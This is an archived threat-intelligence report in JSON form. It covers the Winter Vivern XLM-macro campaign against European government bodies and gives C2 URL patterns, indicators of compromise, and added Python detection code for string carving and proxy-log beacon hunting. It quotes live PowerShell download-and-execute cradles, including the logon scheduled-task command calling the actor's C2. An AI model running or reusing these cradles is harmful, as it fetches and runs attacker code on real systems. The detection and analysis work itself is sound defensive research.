{
	"id": "ac94bb62-fe26-44e5-b1c0-d0efd24bb04a",
	"created_at": "2026-04-06T00:21:42.545643Z",
	"updated_at": "2026-04-10T03:30:21.385984Z",
	"deleted_at": null,
	"sha1_hash": "0a9527646ec6c64b50b78e006ff9aef70bda6aad",
	"title": "Winter Vivern – all Summer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 640355,
	"plain_text": "Winter Vivern – all Summer\r\nPublished: 2021-09-28 · Archived: 2026-04-05 18:57:56 UTC\r\nIn July, 2021, Lab52 found a currently active infection campaign (domain still up at the time of this writing) attributed to a\r\ngroup referred as Wintervivern after a report published by the research team from DomainTools.\r\nAs the starting point for this research, we recently noticed that unless properly obfuscated, some functions in XLM macro\r\ncould show their arguments in the strings of the excel file containing the macros.\r\nWe decided to take some advantage from this fact, and we tried to hunt for interesting excel files until we found a set of\r\nexcel documents that revealed an active campaign against European governments, and without attribution so far.\r\nWe first caught a generic powershell line in a XLM macro, which caught our attention along with other keywords:\r\npowershell.exe -c iex((new-object net.webclient).DownloadString(‘https://server/run.txt’))\r\nAdditionally, the yara ruleset created by John Lambert (@JohnLaTwC) indicated that the XML macro contained in this\r\ndocument was potentially created using SharpShooter (gen_Excel4Macro_Sharpshooter) which could be a useful fact in\r\norder to track the activity of the actors behind these documents.\r\nAs stated before, we also found in this same document other very interesting strings that would give an idea about the\r\ndocument’s content, along with some email addresses. 
Some of these strings were the following:\r\nExternal Relations Committee\r\nWorking Party on Short-Term Economic Prospects\r\nGoverning Board of the Development Centre\r\nGlobal Forum on Public Governance\r\nFurthermore, this document embedded the following URL many times:\r\nhxxps://securetourspd[.]com/syncService/sync.php?v=3ac2cc6263f84836a7cb38d04f1094b6907527c3e0265dd0dc480b0ba1204e51\r\nAfter a quick behavioral analysis of the document, we found that the download from this URL returned the following new commands, served behind a User-Agent filter that only answers requests carrying the Microsoft Excel User-Agent.\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 1 of 5\n\nThis new set of commands first downloads an XML file from the same domain and uses it to register a scheduled task for persistence, named “Server_Update_Synchronization-{SDFGEYH-9D36-4HB1-8BWD-0EC1BD4FNM131}”, which runs the following command at logon:\r\npowershell.exe -w hidden -c “start-process ‘powershell.exe’ -win hidden -argumentlist {\r\n$g=New-Object Net.Webclient;\r\n$g.credentials=[net.credentialcache]::DefaultNetworkCredentials;\r\niex $g.DownloadString(‘https://securetourspd.com/../users/2cd6c84c6c64ec05e7b418e15f9d1b7c0dc6733154aa266c64f0cb74e2083472/ceec36e6c881b957\r\nAfter establishing persistence, the script implements a function that amounts to a minimal RAT: every 10 seconds it requests a command from the C2, executes it, and sends the result back to the C2.\r\nThe contacted domain was registered on July 1st and pointed to 185.238[.]169.57, associated with the ISP “IROKO Networks Corporation/Scalaxy B.V.”. 
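
As an added example (not code from the Lab52 post), the following Python shows the hunt this research starts from: carving printable ASCII and UTF-16LE runs out of a raw .xls and keeping the ones that look like XLM function arguments (a PowerShell download cradle, URLs, e-mail addresses). The file bytes are constructed inline from high-byte noise plus the strings quoted above; no real BIFF parsing is involved, and anything not quoted in the post (the noise layout, the regex shapes, the category names) is an assumption made for the example:

```python
import re

# Constructed stand-in for the bytes of an .xls carrying an unobfuscated XLM
# (Excel 4.0) macro. Real BIFF records are replaced by high-byte noise; what
# matters is that the macro's function arguments sit in the file as plain ASCII
# or UTF-16LE text. The strings embedded here are the ones quoted in the post.
NOISE = bytes(range(128, 256))
Q = chr(39)  # a single quote, kept out of the literals so none need escaping
CRADLE = ('powershell.exe -c iex((new-object net.webclient).DownloadString('
          + Q + 'https://server/run.txt' + Q + '))')
SYNC_URL = ('https://securetourspd.com/syncService/sync.php?v='
            '3ac2cc6263f84836a7cb38d04f1094b6907527c3e0265dd0dc480b0ba1204e51')
SAMPLE_XLS = (NOISE + CRADLE.encode('utf-16-le') + NOISE
              + SYNC_URL.encode('utf-16-le') + NOISE
              + b'External Relations Committee' + NOISE
              + b'mloncar@seidco.net' + NOISE)

# Printable runs of 8+ characters, once as ASCII and once as UTF-16LE (each
# printable byte followed by a NUL), the same idea as strings -e l.
ASCII_RUN = re.compile(b'[ -~]{8,}')
WIDE_RUN = re.compile(b'(?:[ -~]' + bytes([0]) + b'){8,}')

def extract_strings(data):
    found = [m.group().decode('ascii') for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode('utf-16-le') for m in WIDE_RUN.finditer(data)]
    return found

# Argument shapes worth hunting for: a PowerShell download cradle, URLs the
# macro will contact, and e-mail addresses left in the decoy text.
HUNT = {
    'download_cradle': re.compile('(?i)powershell.*?(downloadstring|iex|invoke-expression).*'),
    'url': re.compile('https?://[0-9A-Za-z./?=_-]+'),
    'email': re.compile('[0-9A-Za-z._-]+@[0-9A-Za-z.-]+[.][A-Za-z]{2,}'),
}

def hunt_xls(data):
    # Returns {category: [matches]}. Empty lists in every category mean that
    # nothing argument-like survived, i.e. the macro is probably obfuscated
    # and needs a real XLM parser or emulator rather than string carving.
    hits = {name: [] for name in HUNT}
    for s in extract_strings(data):
        for name, pattern in HUNT.items():
            hits[name] += [m.group() for m in pattern.finditer(s)]
    return hits

if __name__ == '__main__':
    for name, matches in hunt_xls(SAMPLE_XLS).items():
        print(name, matches)
```

Run over a corpus, a hit in download_cradle, or an e-mail address inside a document whose decoy text mentions a ministry, is exactly the kind of signal that surfaced this campaign. When every list comes back empty the macro is probably obfuscated, and a tool that parses or emulates XLM (olevba from oletools, XLMMacroDeobfuscator) is the next step rather than more regexes.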
Researching this domain, we found that VirusTotal showed several interesting full URLs, one of them being the URL we had already found in the starting document.\r\nIt was also interesting that the URL containing “mzv.sk/downloadFile” was actually indexed by Google:\r\nWe could also retrieve some of the XLS files served from the domain, and observed that these documents contained no functionality or suspicious strings.\r\nHowever, after reviewing these documents and the URLs, we noticed that both the documents and the domains embedded in the URL path were directly related to government institutions in different countries:\r\nsds.va –\u003e Segreteria di Stato – Vaticano – Secretariat of State\r\nlrp.lt –\u003e Lietuvos Respublikos Prezidentas – Lithuania – President of the Republic of Lithuania\r\nmzv.sk –\u003e Ministerstvo zahraničných vecí – Slovakia – Ministry of Foreign Affairs\r\nAt this point we could identify a pattern in the URLs found that let us split the C2 contacts into four URL types with different functions.\r\n1. https:// [C2 domain]/[target domain]/excel_files_service/downloadFile.php?v=[some victim ID]\r\n2. https:// [C2 domain]/syncService/sync.php?v=[some victim ID]\r\n3. https:// [C2 domain]/../users/[some victim ID]/[some file ID].php\r\n4. https:// [C2 domain]/xml_file.xml\r\nURL #1 just downloads an XLS file without macros, which suggests it is used to serve clean files as decoys.\r\nURL #2 is found in the XLS files carrying XLM macros and is likely the first contact with the C2 after infection. 
This triggers the next stages of the infection, since it downloads and executes the commands documented above and installs persistence as a scheduled task.\r\nURL #3 is found within the scheduled task and downloads the same commands as URL #2, minus the lines that create the scheduled task. Most importantly, the same URL structure is also used for the C2 channel: different [file ID] values are used to request commands and to send back their results.\r\nURL #4 downloads the XML file used to register the scheduled task.\r\nWe tried to pull the thread of these URL structures, but after some unsuccessful research we went back to the execution details and finally found something by searching for the name of the scheduled task.\r\nWith the help of Google dorking, we found a new XLS document with Excel 4.0 macros uploaded to the public any.run sandbox:\r\nΕνημερωμένος κατάλογος_NS.xls (Greek for “Updated catalogue”) fdc4631008461df18e78fb653662f111\r\nUsing the same information, we also found in VirusTotal Intelligence (VTi) two .txt files named serverHttpRequest(RUN).txt that were downloaded by different samples:\r\n6661ea544a541357ada6c32eb70cd96c\r\n7a59366676daaa95cc71a0110ef75753\r\nThe two .txt files turned out to hold, with slight differences, the same PowerShell content that the malicious XLS executes on its first download, and the XLS file from any.run also turned out to use the same techniques. 
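
As an added example, not code from the post, the four URL roles above translate directly into a proxy-log hunt: classify each request against the patterns for URLs #1 to #4, record whether it carried the Microsoft Excel User-Agent the C2 filters on, and flag clients whose URL #3 requests recur at the RAT’s 10-second polling interval. The log layout (time|client|url|user-agent), the User-Agent strings, the aaaa1111 file ID and the two-second tolerance are assumptions made for the example; the domain and the victim IDs are the ones quoted above:

```python
import re
import statistics
from datetime import datetime

# Constructed proxy log in a time|client|url|user-agent layout. The layout,
# the User-Agent strings and the hex file ID are assumptions for this example,
# not data from the post. Host 10.0.0.5 walks the chain described above: decoy
# fetch and first contact from Excel, task XML, then 10-second C2 polling from
# a Net.WebClient that sends no User-Agent (logged as '-'). The last line is
# unrelated browsing that must not be flagged.
C2 = 'securetourspd.com'
VICTIM = '3ac2cc6263f84836a7cb38d04f1094b6907527c3e0265dd0dc480b0ba1204e51'
USER = '2cd6c84c6c64ec05e7b418e15f9d1b7c0dc6733154aa266c64f0cb74e2083472'
EXCEL_UA = 'Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.14326; Pro)'
SAMPLE_LOG = [
    f'2021-07-12T09:00:00|10.0.0.5|https://{C2}/mzv.sk/excel_files_service/downloadFile.php?v={VICTIM}|{EXCEL_UA}',
    f'2021-07-12T09:00:02|10.0.0.5|https://{C2}/syncService/sync.php?v={VICTIM}|{EXCEL_UA}',
    f'2021-07-12T09:00:03|10.0.0.5|https://{C2}/xml_file.xml|-',
    f'2021-07-12T09:00:04|10.0.0.5|https://{C2}/../users/{USER}/aaaa1111.php|-',
    f'2021-07-12T09:00:14|10.0.0.5|https://{C2}/../users/{USER}/aaaa1111.php|-',
    f'2021-07-12T09:00:24|10.0.0.5|https://{C2}/../users/{USER}/aaaa1111.php|-',
    f'2021-07-12T09:00:34|10.0.0.5|https://{C2}/../users/{USER}/aaaa1111.php|-',
    '2021-07-12T09:00:20|10.0.0.7|https://www.example.org/index.html|Mozilla/5.0 (Windows NT 10.0) Firefox/90.0',
]

# The four URL roles (#1 to #4) as regexes; [.] and [?] stand for the literal
# characters. Victim and file IDs are treated as any lowercase hex string.
STAGES = [
    ('1_decoy_download', re.compile('^https?://(?P<c2>[^/]+)/(?P<target>[^/]+)/excel_files_service/downloadFile[.]php[?]v=(?P<victim>[0-9a-f]+)$')),
    ('2_first_contact', re.compile('^https?://(?P<c2>[^/]+)/syncService/sync[.]php[?]v=(?P<victim>[0-9a-f]+)$')),
    ('3_c2_channel', re.compile('^https?://(?P<c2>[^/]+)/(?:[.][.]/)?users/(?P<victim>[0-9a-f]+)/(?P<file>[0-9a-f]+)[.]php$')),
    ('4_task_xml', re.compile('^https?://(?P<c2>[^/]+)/[^/]+[.]xml$')),
]

def classify(url):
    # Map a URL onto one of the four roles; (None, {}) for anything else.
    for stage, pattern in STAGES:
        m = pattern.match(url)
        if m:
            return stage, m.groupdict()
    return None, {}

def analyse(lines, interval=10, tolerance=2, min_polls=3):
    # Returns (events, beacons): every request matching a role, tagged with
    # whether it carried the Excel User-Agent the C2 filters on, plus each
    # client/C2 pair whose role-3 requests recur every ~interval seconds.
    events, polls = [], {}
    for line in lines:
        ts, src, url, ua = line.split('|', 3)
        stage, fields = classify(url)
        if stage is None:
            continue
        when = datetime.fromisoformat(ts)
        events.append({'time': when, 'src': src, 'stage': stage,
                       'excel_ua': 'Microsoft Excel' in ua, **fields})
        if stage == '3_c2_channel':
            polls.setdefault((src, fields['c2']), []).append(when)
    beacons = []
    for (src, c2), times in polls.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(times) >= min_polls and all(abs(g - interval) <= tolerance for g in gaps):
            beacons.append({'src': src, 'c2': c2, 'polls': len(times),
                            'interval': statistics.median(gaps)})
    return events, beacons

if __name__ == '__main__':
    events, beacons = analyse(SAMPLE_LOG)
    for e in events:
        print(e['time'].time(), e['src'], e['stage'],
              'excel-ua' if e['excel_ua'] else 'other-ua', e.get('target', ''))
    print('beacons:', beacons)
```

The chain it reports for 10.0.0.5 is the one to alert on: a document fetch and a sync.php contact from Excel itself, then a task XML and steady role-3 polling from a client that sends no User-Agent at all, which is what a bare Net.WebClient does. The patterns are tied to the July 2021 paths and need refreshing when the actor changes infrastructure, but the stage logic and the timing check carry over.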
In fact, the Excel file appears to download one of those two files, since it contacts the following URL, whose domain was also found in the .txt files:\r\nhxxps://secure-daddy[.]com/wintervivern/server/serverHttpRequest(RUN).txt\r\nAt this point, the “wintervivern” path in the URL allowed us to link this new campaign to another recent campaign from May 2021, named “Winter Vivern” and described by the DomainTools research team.\r\nOne important thing to note, as DomainTools also stated, is that all the information contained in the different XLS documents appears to be public, which means these documents were carefully crafted to target very specific entities.\r\nThanks to this discovery, we obtained a new set of similar malicious XLS files with the same Excel 4.0 macros but different domains, which extended the list of targeted countries while still aiming at government institutions.\r\nComparing the full URLs used in both campaigns, the May 2021 URLs map onto the four URL types above as follows:\r\n1. No equivalent URL\r\n2. https:// [C2 domain]/wintervivern/server/serverHttpRequest(RUN).txt\r\n3. a. https:// [C2 domain]/wintervivern/vivern/getAnswer.php?username=$uname\r\n   b. https:// [C2 domain]/wintervivern/vivern/getcommand?username=$uname\r\n4. a. https:// [C2 domain]/vivern/test_old.xml\r\n   b. https:// [C2 domain]/vivern/test.xml\r\nThe slight differences between the two URL sets reveal interesting information about the evolution of this threat actor.\r\nFirst, in the May campaign we did not find a path serving the clean files that we assume are used as decoys. Secondly, all XLS files share a single common URL instead of carrying victim identifiers. 
Because there are no victim identifiers, the URLs for receiving commands and delivering results are more generic, and only the username of the infected computer is reported to the C2. Lastly, we find two different versions of the XML document served for the scheduled task, both named “test”. This could be intentional so as not to raise suspicion on the victim, but it is clear that some details of this actor’s TTPs have evolved, and the actor is currently active.\r\nIndicators of Compromise:\r\n37.252[.]9.123\r\n37.252.5[.]133\r\n185.238[.]169.57\r\nsecuretourspd[.]com\r\nsecure-daddy[.]com\r\ncentr-security[.]com\r\nsecuremanag[.]com\r\nmloncar@seidco[.]net\r\n94f45ba55420961451afd1b70657375ec64b7697a515a37842478a5009694cfa\r\n2a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a\r\nf84044bddbd3e05fac1319c988919492971553bb65dbf7b7988d66a8cd677eb8\r\nbd1efa4cf3f02cd8723c48deb5f69a432c22f359b93cab4f1d2a9f037a236eaa\r\n00f6291012646213a5aab81153490bb121bbf9c64bb62eb4ce582c3af88bccfd\r\n638bedcc00c1b1b8a25026b34c29cecc76c050aef56fa55f6e8878e6b951e473\r\nc34e98a31246f0903d4742dcf0a9890d5328ba8a1897fcf9cd803e104591ed5f\r\n4f498238ba3568fd9dc2d12954e16bdd06ddadd4484fa2b40c6f9cf08a2c1360\r\nd66b7443285a23cea3c21cdfeb7fbc22cac53f347437ff26b9d709279996744a\r\n0303936e7341b47b797b42b6911101d72a82f38faa263898c5993e7ee90107cc\r\n066ac6b068ba1b3f177173a113085cc53c785e875b841948df8bbf095c61807d\r\n63005efc652557fad43118273e11f7b37e2d59db2d677e936cddab82fba30602\r\n2f52434696f98c9668a85f1af5dd4af2be729a7971f878ca9125731e27c63c50\r\nb5551ee3d24c53983670fca24e07f0b86ceb3adb7ac353d59fc98f481e5339ca\r\ncdca87c79b4c3c0ed4ffad2a7a64f267250d94ed9e9f8d931faad91cecb5a595\r\n0682e44d2e37f2f7b3f42fffa8366f4b20470ab54ece04da444f47efda1ac610\r\nSource: 
https://lab52.io/blog/winter-vivern-all-summer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://lab52.io/blog/winter-vivern-all-summer/"
	],
	"report_names": [
		"winter-vivern-all-summer"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a13b5ca4-fb52-44a9-aa5a-595eca6789ed",
			"created_at": "2022-10-25T15:50:23.4331Z",
			"updated_at": "2026-04-10T02:00:05.381716Z",
			"deleted_at": null,
			"main_name": "Sharpshooter",
			"aliases": [
				"Sharpshooter"
			],
			"source_name": "MITRE:Sharpshooter",
			"tools": [
				"Rising Sun"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434902,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.pdf",
		"text": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.txt",
		"img": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.jpg"
	}
}